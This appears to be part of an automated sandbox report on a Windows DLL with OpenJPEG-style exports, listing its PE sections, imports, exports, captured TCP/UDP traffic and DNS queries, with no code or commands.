IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa5645	0xa5800	False	0.474065037292	data	6.66550908033	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xa7000	0x12d78	0x12e00	False	0.547327711093	data	5.9880767358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0xf6d8	0xea00	False	0.181223290598	data	4.5951956439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xca000	0x33c8	0x3400	False	0.779522235577	data	6.64818047623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

VirtualAlloc, VirtualProtect, GetProcAddress, LoadLibraryA, QueryPerformanceCounter, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, HeapSize, RaiseException, RtlUnwind, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetStdHandle, GetFileType, GetModuleFileNameW, WriteConsoleW, ReadFile, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, WriteFile, OutputDebugStringW, CloseHandle, GetConsoleMode, ReadConsoleW, GetConsoleOutputCP, HeapReAlloc, FlushFileBuffers, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, CreateFileW, SetEndOfFile

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10001140
_opj_codec_set_threads@8	2	0x1003f500
_opj_create_compress@4	3	0x1003f8f0
_opj_create_decompress@4	4	0x1003f170
_opj_decode@12	5	0x1003f690
_opj_decode_tile_data@20	6	0x1003f880
_opj_destroy_codec@4	7	0x1003f380
_opj_destroy_cstr_index@4	8	0x1003fe10
_opj_destroy_cstr_info@4	9	0x1003fd40
_opj_dump_codec@12	10	0x1003fd80
_opj_encode@8	11	0x1003fcf0
_opj_encoder_set_extra_options@8	12	0x1003fc00
_opj_end_compress@8	13	0x1003fca0
_opj_end_decompress@8	14	0x1003f3e0
_opj_get_cstr_index@4	15	0x1003fde0
_opj_get_cstr_info@4	16	0x1003fdb0
_opj_get_decoded_tile@16	17	0x1003f6f0
_opj_get_num_cpus@0	18	0x10071720
_opj_has_thread_support@0	19	0x10071710
_opj_image_create@12	20	0x10070800
_opj_image_data_alloc@4	21	0x1003ef60
_opj_image_data_free@4	22	0x1003ef80
_opj_image_destroy@4	23	0x100709c0
_opj_image_tile_create@12	24	0x10070a50
_opj_read_header@12	25	0x1003f540
_opj_read_tile_header@40	26	0x1003f800
_opj_set_MCT@16	27	0x1003fe40
_opj_set_decode_area@24	28	0x1003f630
_opj_set_decoded_components@16	29	0x1003f5b0
_opj_set_decoded_resolution_factor@8	30	0x1003f750
_opj_set_default_decoder_parameters@4	31	0x1003f440
_opj_set_default_encoder_parameters@4	32	0x1003fa80
_opj_set_error_handler@12	33	0x1003f130
_opj_set_info_handler@12	34	0x1003f0b0
_opj_set_warning_handler@12	35	0x1003f0f0
_opj_setup_decoder@8	36	0x1003f4a0
_opj_setup_encoder@12	37	0x1003fbb0
_opj_start_compress@12	38	0x1003fc40
_opj_stream_create@8	39	0x1006f140
_opj_stream_create_default_file_stream@8	40	0x1003efa0
_opj_stream_create_file_stream@12	41	0x1003efc0
_opj_stream_default_create@4	42	0x1006f120
_opj_stream_destroy@4	43	0x1006f230
_opj_stream_set_read_function@8	44	0x1006f290
_opj_stream_set_seek_function@8	45	0x1006f320
_opj_stream_set_skip_function@8	46	0x1006f2f0
_opj_stream_set_user_data@12	47	0x1006f350
_opj_stream_set_user_data_length@12	48	0x1006f380
_opj_stream_set_write_function@8	49	0x1006f2c0
_opj_version@0	50	0x1003ef50
_opj_write_tile@20	51	0x1003f790

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2021 00:42:37.416728973 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.416769028 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.416857004 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.417571068 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.417597055 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.417651892 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.418483973 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.418515921 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.418792009 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.418807030 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.464937925 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.465014935 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.470335960 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.470347881 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.470647097 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.470745087 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.470959902 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.472254038 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.472323895 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.477349043 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.477361917 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.477627039 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.477698088 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502187967 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502274990 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502334118 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502353907 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502374887 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502388954 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502449989 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502454042 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502480030 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502522945 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502541065 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502551079 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502609015 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502660990 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502670050 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502681971 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.502711058 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502759933 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.502772093 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:37.505373001 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.510385036 CET	49812	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:37.510400057 CET	443	49812	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:41.033675909 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.033716917 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.034060955 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.034090042 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.034154892 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.034235001 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.035399914 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.035428047 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.035475969 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.035504103 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.038599014 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.038625956 CET	443	49824	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.039105892 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.039169073 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.039191961 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.039284945 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.040556908 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.040575027 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.043176889 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.043203115 CET	443	49824	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.087774038 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.088000059 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.090512991 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.092152119 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.095999956 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.097666025 CET	443	49824	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.099179983 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.099328041 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.125207901 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.125247955 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.125646114 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.126580954 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.126621962 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.126653910 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.126996040 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.127593040 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.127614021 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.127652884 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.128087044 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.128154039 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.128154993 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.129198074 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.131643057 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.131671906 CET	443	49824	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.131968975 CET	443	49824	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.132272005 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.147218943 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.147411108 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.147471905 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.147663116 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.151551008 CET	49825	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:42:41.151566029 CET	443	49825	142.250.203.102	192.168.2.5
Dec 3, 2021 00:42:41.154439926 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.154577017 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:41.154853106 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.155790091 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.159687996 CET	49823	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:41.159701109 CET	443	49823	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:43.549566031 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.549608946 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.550422907 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.552489042 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.552541971 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.552584887 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.552618027 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.552731037 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.552731037 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.552757978 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.552784920 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.554491043 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.554506063 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.554563046 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.554595947 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.600303888 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.600955963 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.602957010 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.603591919 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.606025934 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.606182098 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.606205940 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.606432915 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.606553078 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.606560946 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.606574059 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.606726885 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.612448931 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.612472057 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.612993956 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.613014936 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.613054991 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.613220930 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.619065046 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.619087934 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.619293928 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.619307041 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.619385958 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.619745970 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.623164892 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623291016 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623349905 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623416901 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623465061 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623497009 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.623518944 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623533964 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.623574972 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623621941 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623667955 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623703003 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.623714924 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.623749971 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.624017954 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.624078035 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.624130011 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.624140024 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.624177933 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.624362946 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.625189066 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.628715038 CET	49834	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.628741980 CET	443	49834	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630064964 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630143881 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630230904 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630244017 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.630290031 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630304098 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630417109 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630455017 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.630475998 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630490065 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630542994 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630575895 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.630601883 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630791903 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630856991 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630888939 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.630893946 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.630909920 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.631583929 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.631599903 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.631839991 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.631877899 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.631912947 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.631943941 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.631979942 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.631997108 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.632011890 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.632030964 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.632755041 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.634263039 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.635610104 CET	49836	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.635624886 CET	443	49836	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.636729956 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.636804104 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.636883020 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.636957884 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637073994 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.637104034 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637130976 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.637208939 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637293100 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637299061 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.637322903 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637432098 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637461901 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.637474060 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.637485981 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637553930 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637593031 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.637614012 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.637672901 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:43.638346910 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.641448021 CET	49835	443	192.168.2.5	151.101.1.44
Dec 3, 2021 00:42:43.641473055 CET	443	49835	151.101.1.44	192.168.2.5
Dec 3, 2021 00:42:52.453128099 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:52.453201056 CET	443	49813	104.26.7.139	192.168.2.5
Dec 3, 2021 00:42:52.453329086 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:42:56.070480108 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:56.070652962 CET	443	49822	104.26.3.70	192.168.2.5
Dec 3, 2021 00:42:56.070713043 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:42:56.070739985 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:43:27.757684946 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:27.757750988 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:27.757838011 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:27.805542946 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:27.805602074 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:27.893865108 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:27.893976927 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.376135111 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.376157999 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:28.376554012 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:28.377418995 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.381026983 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.428874016 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:28.588517904 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:28.588604927 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:43:28.588618994 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.588660955 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.589075089 CET	49881	443	192.168.2.5	172.104.227.98
Dec 3, 2021 00:43:28.589097977 CET	443	49881	172.104.227.98	192.168.2.5
Dec 3, 2021 00:44:12.835684061 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:44:12.835726023 CET	49822	443	192.168.2.5	104.26.3.70
Dec 3, 2021 00:44:12.836014032 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:44:12.836044073 CET	49824	443	192.168.2.5	142.250.203.102
Dec 3, 2021 00:44:12.836360931 CET	49813	443	192.168.2.5	104.26.7.139
Dec 3, 2021 00:44:12.836394072 CET	49813	443	192.168.2.5	104.26.7.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2021 00:42:23.538032055 CET	62176	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:29.030539036 CET	63183	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:29.638221025 CET	60151	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:29.661101103 CET	53	60151	8.8.8.8	192.168.2.5
Dec 3, 2021 00:42:31.998594999 CET	55161	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:32.020353079 CET	53	55161	8.8.8.8	192.168.2.5
Dec 3, 2021 00:42:32.864650965 CET	54757	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:32.884354115 CET	53	54757	8.8.8.8	192.168.2.5
Dec 3, 2021 00:42:37.060781956 CET	49992	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:37.103295088 CET	60075	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:37.382968903 CET	55016	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:37.402966022 CET	53	55016	8.8.8.8	192.168.2.5
Dec 3, 2021 00:42:40.976524115 CET	64345	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:40.982070923 CET	57128	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:41.004554987 CET	53	57128	8.8.8.8	192.168.2.5
Dec 3, 2021 00:42:41.004832029 CET	53	64345	8.8.8.8	192.168.2.5
Dec 3, 2021 00:42:41.275290966 CET	54791	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:43.497526884 CET	50463	53	192.168.2.5	8.8.8.8
Dec 3, 2021 00:42:43.516705036 CET	53	50463	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 3, 2021 00:42:23.538032055 CET	192.168.2.5	8.8.8.8	0x1030	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:29.030539036 CET	192.168.2.5	8.8.8.8	0xee31	Standard query (0)	browser.events.data.msn.com	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:29.638221025 CET	192.168.2.5	8.8.8.8	0xc0d6	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:31.998594999 CET	192.168.2.5	8.8.8.8	0x2c8f	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:32.864650965 CET	192.168.2.5	8.8.8.8	0xbf8e	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:37.060781956 CET	192.168.2.5	8.8.8.8	0x380c	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
